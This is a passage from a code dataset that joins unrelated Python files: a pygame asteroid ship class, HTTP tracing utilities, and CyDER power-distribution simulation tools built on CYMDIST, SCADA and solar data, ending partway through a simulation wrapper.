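A minimal usage sketch for the `Bala` class above, assuming pygame is installed; the surface size and position are made-up values.
```python
# Illustrative only: a plain pygame Surface stands in for the real bullet sprite.
import pygame

bullet_image = pygame.Surface((4, 10))      # hypothetical placeholder sprite
bullet = Bala(bullet_image, x=100, y=200)   # Bala as defined in bala.py above
print(bullet.rect)                          # -> <rect(100, 200, 4, 10)>
```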
#### File: Jonathan339/Asteroid/nave.py
```python
from animation import Animation
from constants import *
class Nave(Animation):
def __init__(self, image, x, y):
super().__init__(image, x, y)
self.vida = 3
        self.disparo = []
    def quitar_vida(self) -> int:
        """
        Removes one life from the ship.
        """
        if self.vida > 0:
            self.vida -= 1
        return self.vida

    def agrega_vida(self) -> int:
        """
        Adds one life to the ship.
        """
        if self.vida < 3:
            self.vida += 1
        return self.vida
``` |
{
"source": "jonathan-3play/htrace",
"score": 3
} |
#### File: htrace/htrace/__init__.py
```python
import logging
import re
import requests
import datetime
import dateparser
USER_AGENT = "htrace-0.1.0/python-3.9"
ACCEPT_VALUES = {
"jld": "application/ld+json",
"jsonld": "application/ld+json",
"json-ld": "application/ld+json",
}
JSON_TIME_FORMAT = "%Y-%m-%dT%H:%M:%S%z"
"""datetime format string for generating JSON content
"""
def getLogger():
return logging.getLogger("htrace")
def datetimeToJsonStr(dt):
if dt is None:
return None
if dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None:
# Naive timestamp, convention is this must be UTC
return f"{dt.strftime(JSON_TIME_FORMAT)}Z"
return dt.strftime(JSON_TIME_FORMAT)
def dtnow():
"""
Get datetime for now in UTC timezone.
Returns:
datetime.datetime with UTC timezone
Example:
.. jupyter-execute::
import igsn_lib.time
print(igsn_lib.time.dtnow())
"""
return datetime.datetime.now(datetime.timezone.utc)
def utcFromDateTime(dt, assume_local=True):
# is dt timezone aware?
if dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None:
if assume_local:
# convert local time to tz aware utc
            dt = dt.astimezone(datetime.timezone.utc)
        else:
            # assume dt is in UTC, add timezone
            dt = dt.replace(tzinfo=datetime.timezone.utc)
return dt
# convert to utc timezone
return dt.astimezone(datetime.timezone.utc)
def datetimeFromSomething(V, assume_local=True):
if V is None:
return None
if isinstance(V, datetime.datetime):
return utcFromDateTime(V, assume_local=assume_local)
if isinstance(V, float) or isinstance(V, int):
# from time.time(), which is offset from epoch UTC
dt = datetime.datetime.fromtimestamp(V)
#dt = dt.replace(tzinfo=datetime.timezone.utc)
if assume_local:
dt = dt.astimezone()
else:
dt = dt.astimezone(datetime.timezone.utc)
return dt
#return utcFromDateTime(
# datetime.datetime.fromtimestamp(V), assume_local=assume_local
#)
if isinstance(V, str):
return utcFromDateTime(
dateparser.parse(V, settings={"RETURN_AS_TIMEZONE_AWARE": True}),
assume_local=assume_local,
)
return None
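# Illustrative examples of the helpers above:
#   datetimeToJsonStr(datetime.datetime(2021, 3, 1, 12, 0))
#       -> "2021-03-01T12:00:00Z"  (naive input is treated as UTC by convention)
#   datetimeFromSomething(1614600000, assume_local=False)
#       -> the corresponding timezone-aware UTC datetime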
def dtdsecs(t):
return t.seconds + t.microseconds / 1000000.0
def responseSummary(resp, tstart, tend):
"""
JSON-able conversion of requests response info dict
Args:
resp: A requests response-like thing
Returns:
dict
"""
def httpDateToJson(d):
if d is None:
return d
dt = datetimeFromSomething(d)
return datetimeToJsonStr(dt)
def addHistory(r):
row = {
"url": r.url,
"status_code": r.status_code,
"result": None,
"elapsed": dtdsecs(r.elapsed),
"headers": {},
}
for k in r.headers:
row["headers"][k.lower()] = r.headers.get(k)
row["content_type"] = row["headers"].get("content-type", None)
row["last_modified"] = httpDateToJson(row["headers"].get("last-modified", None))
row["date"] = httpDateToJson(row["headers"].get("date", None))
loc = r.headers.get("Location", None)
if loc is not None:
row["result"] = f"Location: {loc}"
else:
row["result"] = "<< body >>"
return row
elapsed = 0.0
rs = {
"request": {},
"responses": [],
"resources_loaded": [],
"tstart": datetimeToJsonStr(datetimeFromSomething(tstart, assume_local=False)),
"tend": datetimeToJsonStr(datetimeFromSomething(tend, assume_local=False)),
"elapsed": elapsed,
}
try:
rs["resources_loaded"] = resp.resources_loaded
except AttributeError as e:
pass
rs["request"]["url"] = resp.request.url
rs["request"]["headers"] = {}
for k in resp.request.headers:
rs["request"]["headers"][k] = resp.request.headers.get(k)
for r in resp.history:
rs["responses"].append(addHistory(r))
elapsed += rs["responses"][-1]["elapsed"]
rs["responses"].append(addHistory(resp))
elapsed += rs["responses"][-1]["elapsed"]
rs["elapsed"] = elapsed
return rs
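# Example use of responseSummary (illustrative; the URL is a placeholder):
#   tstart = dtnow()
#   resp = requests.get("https://example.org/", allow_redirects=True)
#   tend = dtnow()
#   summary = responseSummary(resp, tstart, tend)
#   print(summary["elapsed"], [r["status_code"] for r in summary["responses"]])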
# FROM: https://github.com/digitalbazaar/pyld/blob/master/lib/pyld/jsonld.py L337
# With adjustment to always return lists
def parseLinkHeader(header):
"""
Parses a link header. The results will be key'd by the value of "rel".
Link: <http://json-ld.org/contexts/person.jsonld>; \
rel="http://www.w3.org/ns/json-ld#context"; type="application/ld+json"
Parses as: {
'http://www.w3.org/ns/json-ld#context': [
{
target: http://json-ld.org/contexts/person.jsonld,
type: 'application/ld+json'
}
]
}
If there is more than one "rel" with the same IRI, then entries in the
resulting map for that "rel" will be lists.
:param header: the link header to parse.
:return: the parsed result.
"""
rval = {}
# split on unbracketed/unquoted commas
entries = re.findall(r'(?:<[^>]*?>|"[^"]*?"|[^,])+', header)
if not entries:
return rval
r_link_header = r'\s*<([^>]*?)>\s*(?:;\s*(.*))?'
for entry in entries:
match = re.search(r_link_header, entry)
if not match:
continue
match = match.groups()
result = {'target': match[0]}
params = match[1]
r_params = r'(.*?)=(?:(?:"([^"]*?)")|([^"]*?))\s*(?:(?:;\s*)|$)'
matches = re.findall(r_params, params)
for match in matches:
result[match[0]] = match[2] if match[1] is None else match[1]
rel = result.get('rel', '')
if isinstance(rval.get(rel), list):
rval[rel].append(result)
else:
rval[rel] = [result,]
return rval
``` |
{
"source": "Jonathan56/CyDER",
"score": 2
} |
#### File: cyder/api/views.py
```python
from rest_framework.decorators import api_view, authentication_classes, permission_classes
from rest_framework.authentication import SessionAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.authtoken.models import Token
@api_view()
@authentication_classes([SessionAuthentication])
@permission_classes([IsAuthenticated])
def token_from_session(request):
(token, _) = Token.objects.get_or_create(user=request.user)
return Response({ "token": token.key })
```
#### File: dummy_worker/sim_worker/model_simulation_days.py
```python
import sim_worker.scada as scada
import sim_worker.solarprofile as solarprofile
import pandas
import json
import re
def get_simulation_days(modelName):
"""
Args: model name as a string
    Returns: a python dictionary
keys are the feeder names
Values are pandas Series listing the corresponding two minimum net load days (values indexed by timestamp)
"""
sc=scada.Scada('C:/Users/DRRC/Desktop/raw_SCADA/'+ modelName + '.csv')
#Total PV capacity is arbitrarily chosen to be 1MW
so=solarprofile.solar_profile(sc.data.index[0],sc.data.index[-1],1000)
S1=sc.data
S2=so['GHI']
#removes index duplicates in order to perform an outer join operation on the timestamp index
S1=S1[~S1.index.duplicated()]
S2=S2[~S2.index.duplicated()]
#outer join operation on timestamp with solar values resampled by hourly mean
df = pandas.concat([S2.resample('H').mean(), S1], axis=1, join='outer')
#computes net load as NL=Load-PV
df=df.iloc[:,1:].subtract(df.iloc[:,0], axis='index')
x={}
for col in df :
temp=pandas.Series()
#computes daily minimums for given feeder
d=df[col].resample('D').min()
for idx, month in d.groupby(d.index.month):
#selects the two smallest daily net load minimums for each month
temp=temp.append(month.nsmallest(2))
#makes output json serializable
temp=temp.sort_values()
keys=temp.index.format()
values=temp.tolist()
temp=dict(zip(keys, values))
x[re.search(r"(\d+)",col).group(0)]=temp
return json.dumps(x)
```
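A short sketch of how the JSON returned by `get_simulation_days` might be consumed; the model name, feeder id, and dates below are hypothetical, and the raw SCADA CSV for the model must exist on the worker machine.
```python
import json

result = json.loads(get_simulation_days("my_substation"))  # hypothetical model name
# result looks roughly like:
# {"123456": {"2016-02-14 00:00:00": -512.3, "2016-03-20 00:00:00": -498.7}, ...}
for feeder_id, days in result.items():
    best_day = min(days, key=days.get)
    print(feeder_id, best_day, days[best_day])
```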
#### File: dummy_worker/sim_worker/solarprofile.py
```python
from __future__ import division
# import matplotlib.pyplot as plt
import pandas
import datetime as dt
def solar_profile(start, end, pv_nominal_capacity_kw):
"""
Output solar generation profile based on GHI data (timestep 15 minutes)
GHI data is normalized based on 1 --> 1000 w/m2
Source: NSRDB, Location ID: 146312, Lat: 39.81, Long: 123.5, Elev: 1024
URL: https://maps.nrel.gov/nsrdb-viewer/?aL=UdPEX9%255Bv%255D%3Dt%268VW
YIh%255Bv%255D%3Dt%268VWYIh%255Bd%255D%3D1&bL=clight&cE=0&lR=0&mC=39.91
605629078665%2C-123.0084228515625&zL=9
"""
# Load data from the raw CSV file
df = pandas.read_csv('sim_worker/solar.csv', skiprows=[0, 1])
df.drop(['Relative Humidity', 'Temperature', 'Pressure'],
axis=1, inplace=True)
df['Time'] = df.apply(lambda x: dt.datetime(
x['Year'], x['Month'], x['Day'], x['Hour'], x['Minute'], 0), axis=1)
df.set_index('Time', inplace=True)
df.drop(['Year', 'Month', 'Day', 'Hour', 'Minute'], axis=1, inplace=True)
    # Select data, normalize, and interpolate every 15 minutes
df = df[start:end]
df = df / 1000.0
df = df.resample('15T').interpolate('time')
# Multiply by pv nominal capacity
return df * pv_nominal_capacity_kw
# ###############################
# # HOW TO USE
# start = '2016-06-17 00:00:00'
# end = '2016-06-18 00:00:00'
# pv_nominal_capacity_kw = 60 # [kW]
# profile = solar_profile(start, end, pv_nominal_capacity_kw)
# # Plot profile
# plt.figure(figsize=(11, 5))
# plt.plot(profile)
# plt.ylabel('Active power [kW]')
# plt.show()
```
#### File: source/cymdist_tool/tool.py
```python
from __future__ import division
import pandas
import source.cymdist_tool.type_lookup as lookup
import pickle
import numpy as np
import json
try:
import cympy
except:
# Only installed on the Cymdist server
pass
def list_loads():
"""List all the loads and their demand on each phase"""
# Get a list of all the loads
devices = list_devices(device_type=14)
# Get their active power on each phase
devices['phase_0'] = [0] * len(devices)
devices['phase_1'] = [0] * len(devices)
devices['phase_2'] = [0] * len(devices)
devices['activepower_0'] = [0] * len(devices)
devices['activepower_1'] = [0] * len(devices)
devices['activepower_2'] = [0] * len(devices)
for value in devices.itertuples():
for index in [0, 1, 2]:
try:
devices.loc[value.Index, 'activepower_' + str(index)] = cympy.study.GetValueDevice(
'CustomerLoads[0].CustomerLoadModels[0].CustomerLoadValues[' + str(index) + '].LoadValue.KW',
value.device_number, int(value.device_type_id))
except:
devices.loc[value.Index, 'activepower_' + str(index)] = False
try:
devices.loc[value.Index, 'phase_' + str(index)] = cympy.study.GetValueDevice(
'CustomerLoads[0].CustomerLoadModels[0].CustomerLoadValues[' + str(index) + '].Phase',
value.device_number, int(value.device_type_id))
except:
devices.loc[value.Index, 'phase_' + str(index)] = False
return devices
def list_pvs():
"""List all the PVs and their demand"""
# Get a list of all the loads
devices = list_devices(device_type=39)
# Get their generation on each phase
devices['generation'] = [0] * len(devices)
for value in devices.itertuples():
# Get the according voltage per phase in a pandas dataframe
devices.loc[value.Index, 'generation'] = cympy.study.QueryInfoDevice(
'PVActiveGeneration', value.device_number, int(value.device_type_id))
# Cast the right type
for column in ['generation']:
        devices[column] = devices[column].apply(lambda x: 0 if x == '' else float(x))
return devices
def list_devices(device_type=False, verbose=False):
"""List all devices and return a break down of their type
Args:
device_type (Device): if passed then list of device with the same type
verbose (Boolean): if True print result (default True)
Return:
DataFrame <device, device_type, device_number, device_type_id>
"""
# Get the list of devices
if device_type:
devices = cympy.study.ListDevices(device_type)
else:
# Get all devices
devices = cympy.study.ListDevices()
# Create a dataframe
devices = pandas.DataFrame(devices, columns=['device'])
devices['device_type_id'] = devices['device'].apply(lambda x: x.DeviceType)
devices['device_number'] = devices['device'].apply(lambda x: x.DeviceNumber)
devices['device_type'] = devices['device_type_id'].apply(lambda x: lookup.type_table[x])
# Get the break down of each type
if verbose:
unique_type = devices['device_type'].unique().tolist()
for device_type in unique_type:
print('There are ' + str(devices[devices.device_type == device_type].count()[0]) +
' ' + device_type)
return devices
def list_nodes():
"""List all the nodes
Return:
a DataFrame with section_id, node_id, latitude and longitude
"""
# Get all nodes
nodes = cympy.study.ListNodes()
# Create a frame
nodes = pandas.DataFrame(nodes, columns=['node_object'])
nodes['node_id'] = nodes['node_object'].apply(lambda x: x.ID)
nodes['section_id'] = [0] * len(nodes)
nodes['latitude'] = [0] * len(nodes)
nodes['longitude'] = [0] * len(nodes)
nodes['distance'] = [0] * len(nodes)
for node in nodes.itertuples():
nodes.loc[node.Index, 'section_id'] = cympy.study.QueryInfoNode("SectionId", node.node_id)
nodes.loc[node.Index, 'latitude'] = cympy.study.QueryInfoNode("CoordY", node.node_id)
nodes.loc[node.Index, 'longitude'] = cympy.study.QueryInfoNode("CoordX", node.node_id)
nodes.loc[node.Index, 'distance'] = cympy.study.QueryInfoNode("Distance", node.node_id)
# Cast the right type
for column in ['latitude']:
        nodes[column] = nodes[column].apply(lambda x: None if x == '' else float(x) / (1.26 * 100000))
# Cast the right type
for column in ['longitude']:
        nodes[column] = nodes[column].apply(lambda x: None if x == '' else float(x) / (100000))
# Cast the right type
for column in ['distance']:
        nodes[column] = nodes[column].apply(lambda x: None if x == '' else float(x))
return nodes
def _describe_object(device):
for value in cympy.dm.Describe(device.GetObjType()):
print(value.Name)
def get_device(id, device_type, verbose=False):
"""Return a device
Args:
id (String): unique identifier
device_type (DeviceType): type of device
verbose (Boolean): describe an object
Return:
Device (Device)
"""
# Get object
device = cympy.study.GetDevice(id, device_type)
# Describe attributes
if verbose:
_describe_object(device)
return device
def add_device(device_name, device_type, section_id):
"""Return a device
Args:
device_name (String): unique identifier
device_type (DeviceType): type of device
section_id (String): unique identifier
Return:
Device (Device)
"""
return cympy.study.AddDevice(device_name, device_type, section_id)
def add_pv(device_name, section_id, ns=100, np=100, location="To"):
"""Return a device
Args:
device_name (String): unique identifier
section_id (String): unique identifier
ns (Int): number of pannel in serie (* 17.3 to find voltage)
np (Int): number of pannel in parallel (ns * np * 0.08 to find kW)
location (String): To or From
Return:
Device (Device)
"""
my_pv = add_device(device_name, cympy.enums.DeviceType.Photovoltaic, section_id)
my_pv.SetValue(location, "Location")
return my_pv
def load_allocation(values):
"""Run a load allocation
Args:
        values (dictionary): value1 (KVA) and value2 (PF) for A, B and C
"""
# Create Load Allocation object
la = cympy.sim.LoadAllocation()
# Create the Demand object
demand = cympy.sim.Meter()
# Fill in the demand values
demand.IsTotalDemand = False
demand.DemandA = cympy.sim.LoadValue()
demand.DemandA.Value1 = values['P_A']
demand.DemandA.Value2 = values['Q_A']
demand.DemandB = cympy.sim.LoadValue()
demand.DemandB.Value1 = values['P_B']
demand.DemandB.Value2 = values['Q_B']
demand.DemandC = cympy.sim.LoadValue()
demand.DemandC.Value1 = values['P_C']
demand.DemandC.Value2 = values['Q_C']
demand.LoadValueType = cympy.enums.LoadValueType.KW_KVAR
# Get a list of networks
networks = cympy.study.ListNetworks()
# Set the first feeders demand
la.SetDemand(networks[0], demand)
# Set up the right voltage [V to kV]
cympy.study.SetValueTopo(values['VMAG_A'] / 1000,
"Sources[0].EquivalentSourceModels[0].EquivalentSource.OperatingVoltage1", networks[0])
cympy.study.SetValueTopo(values['VMAG_B'] / 1000,
"Sources[0].EquivalentSourceModels[0].EquivalentSource.OperatingVoltage2", networks[0])
cympy.study.SetValueTopo(values['VMAG_C'] / 1000,
"Sources[0].EquivalentSourceModels[0].EquivalentSource.OperatingVoltage3", networks[0])
# Run the load allocation
la.Run([networks[0]])
def get_voltage(frame, is_node=False):
"""
Args:
devices (DataFrame): list of all the devices or nodes to include
Return:
devices_voltage (DataFrame): devices and their corresponding voltage for
each phase
"""
# Create a new frame to hold the results
voltage = frame.copy()
# Reset or create new columns to hold the result
voltage['voltage_A'] = [0] * len(voltage)
voltage['voltage_B'] = [0] * len(voltage)
voltage['voltage_C'] = [0] * len(voltage)
for value in frame.itertuples():
if not is_node:
# Get the according voltage per phase in a pandas dataframe
voltage.loc[value.Index, 'voltage_A'] = cympy.study.QueryInfoDevice(
"VpuA", value.device_number, int(value.device_type_id))
voltage.loc[value.Index, 'voltage_B'] = cympy.study.QueryInfoDevice(
"VpuB", value.device_number, int(value.device_type_id))
voltage.loc[value.Index, 'voltage_C'] = cympy.study.QueryInfoDevice(
"VpuC", value.device_number, int(value.device_type_id))
else:
# Get the according voltage per phase in a pandas dataframe
voltage.loc[value.Index, 'voltage_A'] = cympy.study.QueryInfoNode("VpuA", value.node_id)
voltage.loc[value.Index, 'voltage_B'] = cympy.study.QueryInfoNode("VpuB", value.node_id)
voltage.loc[value.Index, 'voltage_C'] = cympy.study.QueryInfoNode("VpuC", value.node_id)
# Cast the right type
for column in ['voltage_A', 'voltage_B', 'voltage_C']:
        voltage[column] = voltage[column].apply(lambda x: None if x == '' else float(x))
return voltage
def get_overload(devices):
"""
Args:
devices (DataFrame): list of all the devices to include
first_n_devices (Int): number of row to return
Return:
overload_device (DataFrame): return the n devices with the highest load
"""
# Create a new frame to hold the results
overload = devices.copy()
# Reset or create new columns to hold the result
overload['overload_A'] = [0] * len(overload)
overload['overload_B'] = [0] * len(overload)
overload['overload_C'] = [0] * len(overload)
for device in devices.itertuples():
# Get the according overload per phase in a pandas dataframe
overload.loc[device.Index, 'overload_A'] = cympy.study.QueryInfoDevice(
"OverloadAmpsA", device.device_number, int(device.device_type_id))
overload.loc[device.Index, 'overload_B'] = cympy.study.QueryInfoDevice(
"OverloadAmpsB", device.device_number, int(device.device_type_id))
overload.loc[device.Index, 'overload_C'] = cympy.study.QueryInfoDevice(
"OverloadAmpsC", device.device_number, int(device.device_type_id))
# Cast the right type
for column in ['overload_A', 'overload_B', 'overload_C']:
        overload[column] = overload[column].apply(lambda x: None if x == '' else float(x))
return overload
def get_load(devices):
"""
Args:
devices (DataFrame): list of all the devices to include
Return:
devices_voltage (DataFrame): devices and their corresponding load for
each phase
"""
# Create a new frame to hold the results
load = devices.copy()
# Reset or create new columns to hold the result
load['MWA'] = [0] * len(load)
load['MWB'] = [0] * len(load)
load['MWC'] = [0] * len(load)
load['MWTOT'] = [0] * len(load)
load['MVARA'] = [0] * len(load)
load['MVARB'] = [0] * len(load)
load['MVARC'] = [0] * len(load)
load['MVARTOT'] = [0] * len(load)
for device in devices.itertuples():
# Get the according load per phase in a pandas dataframe
load.loc[device.Index, 'MWA'] = cympy.study.QueryInfoDevice(
"MWA", device.device_number, int(device.device_type_id))
load.loc[device.Index, 'MWB'] = cympy.study.QueryInfoDevice(
"MWB", device.device_number, int(device.device_type_id))
load.loc[device.Index, 'MWC'] = cympy.study.QueryInfoDevice(
"MWC", device.device_number, int(device.device_type_id))
load.loc[device.Index, 'MWTOT'] = cympy.study.QueryInfoDevice(
"MWTOT", device.device_number, int(device.device_type_id))
load.loc[device.Index, 'MVARA'] = cympy.study.QueryInfoDevice(
"MVARA", device.device_number, int(device.device_type_id))
load.loc[device.Index, 'MVARB'] = cympy.study.QueryInfoDevice(
"MVARB", device.device_number, int(device.device_type_id))
load.loc[device.Index, 'MVARC'] = cympy.study.QueryInfoDevice(
"MVARC", device.device_number, int(device.device_type_id))
load.loc[device.Index, 'MVARTOT'] = cympy.study.QueryInfoDevice(
"MVARTOT", device.device_number, int(device.device_type_id))
# Cast the right type
for column in ['MWA', 'MWB', 'MWC', 'MWTOT', 'MVARA', 'MVARB', 'MVARC', 'MVARTOT']:
        load[column] = load[column].apply(lambda x: None if x == '' else float(x))
return load
def get_distance(devices):
"""
Args:
devices (DataFrame): list of all the devices to include
Return:
devices_distance (DataFrame): devices and their corresponding distance from the substation
"""
distance = devices.copy()
# Reset or create new columns to hold the result
distance['distance'] = [0] * len(distance)
for device in devices.itertuples():
# Get the according distance in a pandas dataframe
distance.loc[device.Index, 'distance'] = cympy.study.QueryInfoDevice(
"Distance", device.device_number, int(device.device_type_id))
# Cast the right type
for column in ['distance']:
        distance[column] = distance[column].apply(lambda x: None if x == '' else float(x))
return distance
def get_coordinates(devices):
"""
Args:
devices (DataFrame): list of all the devices to include
Return:
devices_distance (DataFrame): devices and their corresponding latitude
and longitude from the substation
"""
coordinates = devices.copy()
# Reset or create new columns to hold the result
coordinates['latitude'] = [0] * len(coordinates)
coordinates['longitude'] = [0] * len(coordinates)
coordinates['section_id'] = [0] * len(coordinates)
for device in devices.itertuples():
# Get the according latitude in a pandas dataframe
coordinates.loc[device.Index, 'latitude'] = cympy.study.QueryInfoDevice(
"CoordY", device.device_number, int(device.device_type_id))
# Get the according longitude in a pandas dataframe
coordinates.loc[device.Index, 'longitude'] = cympy.study.QueryInfoDevice(
"CoordX", device.device_number, int(device.device_type_id))
# Get the section id in a pandas dataframe
coordinates.loc[device.Index, 'section_id'] = cympy.study.QueryInfoDevice(
"SectionId", device.device_number, int(device.device_type_id))
# Cast the right type
for column in ['latitude']:
        coordinates[column] = coordinates[column].apply(lambda x: None if x == '' else float(x) / (1.26 * 100000))
# Cast the right type
for column in ['longitude']:
        coordinates[column] = coordinates[column].apply(lambda x: None if x == '' else float(x) / (100000))
return coordinates
def get_unbalanced_line(devices):
"""This function requires the get_voltage function has been called before.
Args:
devices (DataFrame): list of all the devices to include
first_n_devices (Int): number of row to return
Return:
overload_device (DataFrame): return the n devices with the highest load
"""
# Get all the voltage
voltage = get_voltage(devices)
# Get the mean voltage accross phase
voltage['mean_voltage_ABC'] = voltage[['voltage_A', 'voltage_B', 'voltage_C']].mean(axis=1)
# Get the max difference of the three phase voltage with the mean
def _diff(value):
diff = []
for phase in ['voltage_A', 'voltage_B', 'voltage_C']:
diff.append(abs(value[phase] - value['mean_voltage_ABC']) * 100 / value['mean_voltage_ABC'])
return max(diff)
voltage['diff_with_mean'] = voltage[['mean_voltage_ABC', 'voltage_A', 'voltage_B', 'voltage_C']].apply(_diff, axis=1)
return voltage
```
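A standalone sketch of the per-phase unbalance metric computed in `get_unbalanced_line`, applied to made-up per-unit voltages.
```python
# Max percent deviation of any phase voltage from the three-phase mean,
# mirroring the _diff helper above (values are illustrative).
va, vb, vc = 1.02, 0.98, 1.00
mean_v = (va + vb + vc) / 3
diff_with_mean = max(abs(v - mean_v) * 100 / mean_v for v in (va, vb, vc))
print(round(diff_with_mean, 2))  # 2.0 -> phase A deviates 2% from the mean
```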
#### File: source/load_forecast/tool.py
```python
from __future__ import division
import source.cymdist_tool.tool as cymdist
import datetime
import pandas
try:
import cympy
except:
pass
class LoadForecast(object):
"""Forecast EV demand at a feeder"""
def __init__(self):
self.configuration = None
self.feeder = None
self.configuration = None
def initialize(self, feeder):
"""Initialize feeder inputs"""
self.feeder = feeder
self.configuration = feeder.configuration
def forecast(self):
"""Forecast load demand and return configuration file for CyDER"""
# Save normalized generation with the right format
load_forecast = self._load_forecast()
# Update the configuration file
self._update_configuration(load_forecast)
return load_forecast, self.configuration
def _update_configuration(self, load_forecast):
"""Update all pvs within feeder with the pv_forecast timeserie"""
# Open model and get the devices from the first model
cympy.study.Open(self.feeder.feeder_folder + self.feeder.feeder_name)
loads = cymdist.list_loads()
# GET FIRST TIME PV FORECAST <----
start = datetime.datetime(2014, 2, 1, 6, 0, 0)
for index, time in enumerate(self.configuration['times']):
dt = start + datetime.timedelta(seconds=time)
for load in loads.iterrows():
_, load = load
self.configuration['models'][index]['set_loads'].append(
{'device_number': load['device_number'],
'active_power': [],
'description': 'load forecast'})
for phase_index in ['0', '1', '2']:
if load['activepower_' + phase_index]:
self.configuration['models'][index]['set_loads'][-1]['active_power'].append(
{'active_power': (float(load['activepower_' + phase_index])
* load_forecast.loc[dt, 'profile']),
'phase_index': phase_index,
'phase': str(load['phase_' + phase_index])})
def _load_forecast(self):
"""Load forecast from static file directly"""
# Load prediction from file
return pandas.read_csv(
'static/load/profile.csv', index_col=0, parse_dates=[0])
```
#### File: static/fmus/cymdist_wrapper.py
```python
import json
try:
import cympy
except:
# Only installed on the Cymdist server
pass
def cymdist(configuration_filename, time, input_voltage_names,
input_voltage_values, output_names, input_save_to_file):
"""Communicate with the FMU to launch a Cymdist simulation
Args:
configuration_filename (String): filename for the model configurations
time (Float): Simulation time
input_voltage_names (Strings): voltage vector names
input_voltage_values (Floats): voltage vector values (same length as voltage_names)
output_names (Strings): vector of name matching CymDIST nomenclature
input_save_to_file (1 or 0): save all nodes results to a file
Example:
>>> time = 0
>>> input_save_to_file = 0
>>> input_voltage_names = ['VMAG_A', 'VMAG_B', 'VMAG_C', 'VANG_A', 'VANG_B', 'VANG_C']
>>> input_voltage_values = [2520, 2520, 2520, 0, -120, 120]
>>> configuration_filename = 'config.json'
>>> output_names = ['IA', 'IAngleA', 'IB', 'IAngleB', 'IC', 'IAngleC']
>>> cymdist(configuration_filename, time, input_voltage_names,
input_voltage_values, output_names, input_save_to_file)
Note:
config.json file format:
{times: [0]
interpolation_method: 'closest_time',
models: [{
filename: 'my_model.sxst',
new_loads: [{
section_id: '',
active_power: '',
}],
new_pvs: [{
section_id: '',
generation: '',
}],
set_pvs: [{
device_number: '',
generation: '',
}],
set_loads: [{
device_number: '',
active_power: [{
active_power: '',
phase_index: '',
phase: c,
}],
}],
}]
}
(time vector must have a 1:1 relationship with the model vector)
output_names can be: ['KWA', 'KWB', 'KWC', 'KVARA', 'KVARB', 'KVARC',
'IA', 'IAngleA', 'IB', 'IAngleB', 'IC', 'IAngleC', 'PFA', 'PFB', 'PFC']
for a greater list see CymDIST > customize > keywords > powerflow
(output unit is directly given by output name)
"""
def _input_voltages(input_voltage_names, input_voltage_values):
"""Create a dictionary from the input values and input names for voltages"""
voltages = {}
for name, value in zip(input_voltage_names, input_voltage_values):
voltages[name] = value
return voltages
def _read_configuration_file(configuration_filename, current_time):
"""This function open the configuration file and pick the right model given
a simulation time.
"""
def _closest_time(current_time, times):
"""Find the closest time, return model index"""
distances = [abs(value - current_time) for value in times]
min_value, min_index = min((value, index) for index, value in enumerate(distances))
return min_index
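        # Example: with times = [0, 3600, 7200] and current_time = 5000, the
        # distances are [5000, 1400, 2200], so _closest_time returns index 1
        # and the second entry of configuration['models'] is used.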
# Open the configuration file and read the configurations
with open(configuration_filename, 'r') as configuration_file:
configuration = json.load(configuration_file)
# Select the appropriate model
model = configuration['models'][_closest_time(current_time, configuration['times'])]
return model
def _set_voltages(voltages, networks):
"""Set the voltage at the source node"""
# Set up the right voltage in kV (input must be V)
cympy.study.SetValueTopo(voltages['VMAG_A'] / 1000,
"Sources[0].EquivalentSourceModels[0].EquivalentSource.OperatingVoltage1", networks[0])
cympy.study.SetValueTopo(voltages['VMAG_B'] / 1000,
"Sources[0].EquivalentSourceModels[0].EquivalentSource.OperatingVoltage2", networks[0])
cympy.study.SetValueTopo(voltages['VMAG_C'] / 1000,
"Sources[0].EquivalentSourceModels[0].EquivalentSource.OperatingVoltage3", networks[0])
return True
def _add_loads(loads):
for index, load in enumerate(loads):
# Add load and overwrite (load demand need to be sum of previous load and new)
temp_load_model = cympy.study.AddDevice(
"MY_LOAD_" + str(index), 14, load['section_id'], 'DEFAULT',
cympy.enums.Location.FirstAvailable , True)
# Set power demand
phases = list(cympy.study.QueryInfoDevice("Phase", "MY_LOAD_" + str(index), 14))
power = load['active_power'] / len(phases)
for phase in range(0, len(phases)):
cympy.study.SetValueDevice(
power,
'CustomerLoads[0].CustomerLoadModels[0].CustomerLoadValues[' + str(phase) + '].LoadValue.KW',
"MY_LOAD_" + str(index), 14)
        # Note: customer count is still 0, as are the energy values; does that matter?
return True
def _set_loads(loads):
for index, load in enumerate(loads):
for phase in load['active_power']:
cympy.study.SetValueDevice(phase['active_power'],
'CustomerLoads[0].CustomerLoadModels[0].CustomerLoadValues[' + str(phase['phase_index']) + '].LoadValue.KW',
load['device_number'], 14)
return True
def _add_pvs(pvs):
"""Add new pvs on the grid"""
for index, pv in enumerate(pvs):
# Add PVs
device = cympy.study.AddDevice("my_pv_" + str(index), cympy.enums.DeviceType.Photovoltaic, pv['section_id'])
# Set PV size (add + 30 to make sure rated power is above generated power)
device.SetValue(int((pv['generation'] + 30) / (23 * 0.08)), "Np") # (ns=23 * np * 0.08 to find kW) --> kw / (23 * 0.08)
device.SetValue(pv['generation'], 'GenerationModels[0].ActiveGeneration')
# Set inverter size
device.SetValue(pv['generation'], "Inverter.ConverterRating")
device.SetValue(pv['generation'], "Inverter.ActivePowerRating")
device.SetValue(pv['generation'], "Inverter.ReactivePowerRating")
return True
def _set_pvs(pvs):
for index, pv in enumerate(pvs):
cympy.study.SetValueDevice(int((pv['generation'] + 30) / (23 * 0.08)), 'Np',
pv['device_number'], 39)
cympy.study.SetValueDevice(pv['generation'], 'GenerationModels[0].ActiveGeneration',
pv['device_number'], 39)
cympy.study.SetValueDevice(pv['generation'], 'Inverter.ConverterRating',
pv['device_number'], 39)
cympy.study.SetValueDevice(pv['generation'], 'Inverter.ActivePowerRating',
pv['device_number'], 39)
cympy.study.SetValueDevice(pv['generation'], 'Inverter.ReactivePowerRating',
pv['device_number'], 39)
return True
def _write_results(source_node_id, output_filename):
"""Write result to the file system"""
# Get results
result = {}
keys = ['DwLowVoltWorstA', 'DwLowVoltWorstB', 'DwLowVoltWorstC',
'DwHighVoltWorstA', 'DwHighVoltWorstB', 'DwHighVoltWorstC']
for key in keys:
result[key] = cympy.study.QueryInfoNode(key, str(source_node_id))
# Save results
with open(output_filename, 'w') as f:
json.dump(result, f)
def _output_values(source_node_id, output_names):
"""Query the right output name at the source node"""
output = []
for category in output_names:
temp = cympy.study.QueryInfoNode(category, source_node_id)
output.append(float(temp) * 1.0)
return output
# Process input and check for validity
